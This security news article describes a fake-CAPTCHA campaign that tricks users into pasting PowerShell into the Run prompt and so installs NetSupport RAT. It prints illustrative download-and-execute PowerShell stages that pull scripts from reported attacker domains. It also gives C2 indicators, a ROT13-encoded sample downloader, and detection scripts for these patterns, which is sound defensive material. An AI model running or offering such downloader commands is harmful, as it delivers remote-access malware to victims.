Monday, May 4, 2026

Fake ‘Prove You’re Human’ Prompts Used to Spread NetSupport RAT Malware

Security researchers have recently uncovered a devious malware campaign that employs fake CAPTCHA and “prove you’re human” screens on spoofed websites, most notably imitations of the Gitcodes and DocuSign platforms.

The carefully orchestrated campaign tricks users into executing malicious PowerShell scripts, ultimately installing NetSupport RAT (Remote Access Trojan) on their computers.

This technique capitalizes on users’ familiarity with online verification processes, making it exceptionally dangerous and difficult to detect.

The attack begins when a victim lands on a deceptive webpage, styled to look like a legitimate service such as a Gitcodes “paste tool” website or a DocuSign verification portal.

For example, the domain “gitcodes[.]org” presents itself as a popular code-sharing platform, while “docusign.sa[.]com” mimics the well-known e-signature provider.

Visitors are greeted by seemingly ordinary CAPTCHA prompts or verification requests, instructing them to confirm their humanity by copying a script and running it in the Windows Run prompt.

Technical Execution and Obfuscation Tactics

Once users copy the provided text and execute it via Win+R, a multi-stage PowerShell chain is launched.

The initial script is designed to mimic benign activity, often leveraging simple string concatenation and web requests to retrieve further payloads.

For instance, a typical first-stage script hosted on “gitcodes[.]org” might initiate a web request to a secondary domain, such as “tradingviewtool[.]com,” using a crafted user agent:

```powershell
# First-stage downloader as described above: fetch the next stage with a
# spoofed user agent, write it to disk, then run it
$domain = "http://tradingviewtool.com/info2.php"
$ua = "TradingView"
Invoke-WebRequest -Uri $domain -UserAgent $ua -OutFile "C:\temp\next.ps1"
& "C:\temp\next.ps1"
```

Each subsequent stage typically performs similar actions, downloading and executing additional scripts from new domains, ultimately retrieving the NetSupport RAT payload.

The final stage ensures persistence by modifying the Windows Registry to execute a tampered version of “client32.exe” (disguised as “My Support”) at every logon, making removal difficult.

The DocuSign-spoofed variation adopts similar tactics but adds obfuscation.

The initial script delivered to the clipboard is often encoded using ROT13, a simple substitution cipher, to evade basic signature-based protections.
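A triage helper for this kind of lure, added here as an example and not part of the original article: it takes the string a victim would paste into the Run prompt, tries it both as-is and ROT13-decoded, and reports which view contains the download-and-run patterns the campaign relies on. The clipboard sample, the `example.invalid` URL and the indicator names are constructed for the example.

```python
"""Triage a 'paste this into Win+R' string: undo ROT13 if present and flag
PowerShell download-and-execute patterns. Sample input is constructed."""
import codecs
import re

# Patterns that together characterise a staged PowerShell downloader.
# The keys are reporting labels chosen for this example, not tool identifiers.
INDICATORS = {
    "web_request": re.compile(
        r"\b(Invoke-WebRequest|iwr|Invoke-RestMethod|irm|DownloadString|DownloadFile)\b", re.I),
    "write_to_disk": re.compile(r"-OutFile\b", re.I),
    "temp_path": re.compile(r"\$env:TEMP|\\Temp\\|C:\\temp", re.I),
    "hidden_window": re.compile(r"-w(indowstyle)?\s+hidden", re.I),
    "exec_fetched": re.compile(r"\bIEX\b|Invoke-Expression|Start-Process|&\s*[\"'$]", re.I),
}

# Constructed sample: a hidden-window downloader one-liner, ROT13-encoded the way
# the article describes the DocuSign-themed clipboard payload being obfuscated.
SAMPLE_CLIPBOARD = codecs.encode(
    'powershell -w hidden -c "Invoke-WebRequest -Uri https://example.invalid/s.php '
    '-OutFile $env:TEMP\\s.ps1; & $env:TEMP\\s.ps1"',
    "rot_13",
)


def rot13(text: str) -> str:
    """ROT13 is its own inverse: letters shift by 13, digits and symbols are untouched."""
    return codecs.encode(text, "rot_13")


def find_indicators(text: str) -> list:
    """Return the labels of every indicator pattern present in the text."""
    return [name for name, rx in INDICATORS.items() if rx.search(text)]


def triage(clipboard: str) -> dict:
    """Score the text as-is and ROT13-decoded; report the view with the most hits.

    Two or more indicators in one view is treated as suspicious, which keeps a
    lone '&' or a single Start-Process in an ordinary command from alerting."""
    views = {"plain": clipboard, "rot13": rot13(clipboard)}
    best = max(views, key=lambda k: len(find_indicators(views[k])))
    hits = find_indicators(views[best])
    return {
        "encoding": best if hits else None,
        "decoded": views[best] if hits else clipboard,
        "indicators": hits,
        "suspicious": len(hits) >= 2,
    }


if __name__ == "__main__":
    result = triage(SAMPLE_CLIPBOARD)
    print(f"encoding: {result['encoding']}, suspicious: {result['suspicious']}")
    print("indicators:", ", ".join(result["indicators"]))
    print("decoded:", result["decoded"])
```

Because ROT13 leaves digits and punctuation alone, a decoder that only tries one rotation is enough here; the same scoring approach extends to Base64 or character-code encodings by adding further views to the `views` dictionary.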

The user’s click on the fake CAPTCHA triggers an AJAX-based command-and-control (C2) mechanism, which polls a server-side script (“c.php”) every second until it receives confirmation that the user has run the script on their machine.

If the condition is met, the server responds, triggering a refresh and delivering a second-stage PowerShell payload:

```powershell
# Simplified representative sample for illustration: fetch the second stage
# into the user's temp folder and launch it in a fresh PowerShell process
$url = "https://docusign.sa.com/verification/s.php?an=1"
Invoke-WebRequest -Uri $url -OutFile "$env:TEMP\stage2.ps1"
Start-Process -FilePath "powershell" -ArgumentList "-File $env:TEMP\stage2.ps1"
```

Multiple script stages are used to fetch additional files, such as “wbdims.exe” or “jp2launcher.exe,” which unpack and launch the NetSupport RAT executable.

Network activity logs and payload analyses indicate that the malware communicates with several servers, including “mhousecreative[.]com” and “170.130.55.203:443,” to complete its mission.
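Host-telemetry detection for the three behaviours described above (a PowerShell downloader launched from the Run prompt, Run-key persistence for the renamed client32.exe, and contact with the reported infrastructure), added here as an example rather than taken from the article or any vendor product. The events are constructed Sysmon-style records; the SID, user name, file paths and the "My Support" value name are assumptions for the example, while the C2 IP and domains are the ones the article reports.

```python
"""Correlate Sysmon-style host events against the article's described behaviours.
EventID 1 = process create, 13 = registry value set, 3 = network connection.
All records below are constructed for this example, not real telemetry."""
import re

# Infrastructure named in the article.
REPORTED_C2_IPS = {"170.130.55.203"}
REPORTED_C2_DOMAINS = {"mhousecreative.com", "tradingviewtool.com"}

DOWNLOADER_RX = re.compile(
    r"Invoke-WebRequest|\biwr\b|Invoke-RestMethod|DownloadString|DownloadFile", re.I)
RUN_KEY_RX = re.compile(r"\\CurrentVersion\\Run(Once)?\\", re.I)

SAMPLE_EVENTS = [
    # Win+R: the typed command runs as a child of explorer.exe
    {"EventID": 1, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": 'powershell -w hidden -c "Invoke-WebRequest '
                    '-Uri http://tradingviewtool.com/info2.php -OutFile C:\\temp\\next.ps1"'},
    {"EventID": 1, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\notepad.exe", "CommandLine": "notepad.exe"},
    # Persistence: Run value named "My Support" pointing at a user-writable client32.exe
    {"EventID": 13, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "TargetObject": r"HKU\S-1-5-21-1111\Software\Microsoft\Windows\CurrentVersion\Run\My Support",
     "Details": r"C:\Users\alice\AppData\Roaming\MySupport\client32.exe"},
    # Beacon from the renamed RAT client to the reported server
    {"EventID": 3, "Image": r"C:\Users\alice\AppData\Roaming\MySupport\client32.exe",
     "DestinationIp": "170.130.55.203", "DestinationPort": 443, "DestinationHostname": ""},
    # Benign browser traffic to a documentation-range address
    {"EventID": 3, "Image": r"C:\Program Files\Mozilla Firefox\firefox.exe",
     "DestinationIp": "203.0.113.5", "DestinationPort": 443, "DestinationHostname": "example.com"},
]


def rule_run_prompt_downloader(ev):
    """PowerShell spawned by explorer.exe whose command line fetches from the web."""
    if ev.get("EventID") != 1:
        return None
    if not ev["ParentImage"].lower().endswith("\\explorer.exe"):
        return None
    if not ev["Image"].lower().endswith(("\\powershell.exe", "\\pwsh.exe")):
        return None
    if not DOWNLOADER_RX.search(ev["CommandLine"]):
        return None
    return ("run_prompt_downloader", ev["CommandLine"])


def rule_runkey_client32(ev):
    """A Run/RunOnce value whose data points at a client32.exe binary."""
    if ev.get("EventID") != 13:
        return None
    if not RUN_KEY_RX.search(ev["TargetObject"]):
        return None
    if "client32.exe" not in ev["Details"].lower():
        return None
    return ("run_key_client32", ev["TargetObject"])


def rule_c2_contact(ev):
    """Any process connecting to the infrastructure the article reports."""
    if ev.get("EventID") != 3:
        return None
    dst = ev["DestinationIp"]
    host = ev.get("DestinationHostname", "").lower()
    if dst in REPORTED_C2_IPS or host in REPORTED_C2_DOMAINS:
        return ("reported_c2_contact", f'{ev["Image"]} -> {dst}:{ev["DestinationPort"]}')
    return None


RULES = [rule_run_prompt_downloader, rule_runkey_client32, rule_c2_contact]


def detect(events):
    """Run every rule over every event; return (rule_name, detail) tuples in order."""
    alerts = []
    for ev in events:
        for rule in RULES:
            hit = rule(ev)
            if hit:
                alerts.append(hit)
    return alerts


if __name__ == "__main__":
    for name, detail in detect(SAMPLE_EVENTS):
        print(f"[{name}] {detail}")
```

The first rule is the durable one: the explorer.exe to powershell.exe parent-child relationship with a web-fetch cmdlet survives changes of domain and payload, whereas the IP and domain matches only hold until the infrastructure rotates.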

Other campaigns analyzed by security teams show a broadening scope, with identical code patterns appearing on spoofed sites for Okta and media apps, and with legitimate content-sharing platforms such as GitHub and Discord being used for payload distribution.

Security Recommendations and Key Takeaways

This campaign underlines the escalating sophistication of phishing and malware delivery techniques.

The combination of multi-stage downloads, obfuscation, and legitimate-looking prompts is designed to bypass both user caution and automated detection systems. Security experts strongly advise:

  • Exercise extreme caution with any prompt instructing you to copy and run scripts or commands.
    Legitimate websites and services almost never require users to execute PowerShell or command-line scripts.
  • Scrutinize website URLs and SSL certificates.
    Spoofed sites often use lookalike domains and self-signed certificates.
  • Educate users about the risks of self-executing scripts.
    Awareness is a critical defense against such socially engineered attacks.

The NetSupport RAT, while a legitimate remote administration tool, is increasingly abused by threat actors for cyber espionage, data theft, and lateral movement within networks.

This “self-infect” method is reminiscent of both opportunistic and advanced persistent threat (APT) activity, and has been previously associated with groups such as FIN7, Scarlet Goldfinch, and STORM-0408.

Security teams must remain vigilant, as attackers continually refine their techniques.

The recent campaign demonstrates that even seemingly simple “prove you’re human” checks can be deadly when combined with crafty scripting and user trust.
